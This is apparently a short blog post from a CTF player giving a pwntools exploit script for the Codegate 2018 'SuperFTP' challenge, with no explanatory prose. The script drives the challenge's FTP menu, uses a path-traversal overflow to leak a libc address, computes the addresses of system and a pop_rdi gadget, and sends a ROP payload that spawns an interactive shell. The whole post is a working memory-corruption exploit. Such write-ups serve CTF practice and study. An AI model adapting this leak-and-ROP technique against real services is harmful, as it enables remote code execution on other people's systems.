Codegate 2018 SuperFTP

Pwnable/CTF
Codegate 2018 SuperFTP

HSr00t 2018. 2. 5. 18:51
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
import os
 
p=process('./ftp')
#p=remote('ch41l3ng3s.codegate.kr',2121)
elf=ELF('./ftp')
 
 
def join(name,age,id_,pw):
    p.sendafter('Choice:','\x01')
    p.sendlineafter(':',name)
    p.sendlineafter(':',str(age))
    p.sendlineafter(':',id_)
    p.sendlineafter(':',pw)
 
def printf():
    p.sendafter('Choice:','\x02')
 
def login(id_,pw):
    p.sendafter('Choice:','\x03')
    p.sendlineafter(':',id_)
    p.sendlineafter(':',pw)
 
def with_():
    p.sendafter('Choice:','\x04')
 
def download_files():
    p.sendafter('Choice:','\x05')
 
def set_9020():
    p.sendafter('Choice:','\x07')
 
def Menu():
    p.sendafter('Choice:','\x08')    
 
join('AAAA',10,'AAAA','AAAA')
login('AAAA','AAAA')
set_9020()
Menu()
p.send('\x01\x00\x00\x00')
payload = '/../../../'+'B'*24
print p.recvuntil('URL:\n')
p.sendline(payload)
IO_file_underflow = u32(p.recv(4)[::-1]) - 303
libc_base = IO_file_underflow - 0x6b500
system = libc_base + 0x3b060
cmd = libc_base + 0x15fa0f
pop_rdi = libc_base + 0x7894f
print hex(libc_base)
print hex(system)
print hex(cmd)
print hex(pop_rdi)
set_9020()
Menu()
p.send('\x00')
Menu()
p.sendline('\x01\x00\x00\x00')
payload = 'B'*10+'/../../../../../../'+'A'*48+p32(cmd)[::-1]+p32(pop_rdi)[::-1]+p32(system)[::-1]*3
p.sendline(payload)
 
 
p.interactive()
Colored by Color Scripter
cs
저작자표시 (새창열림)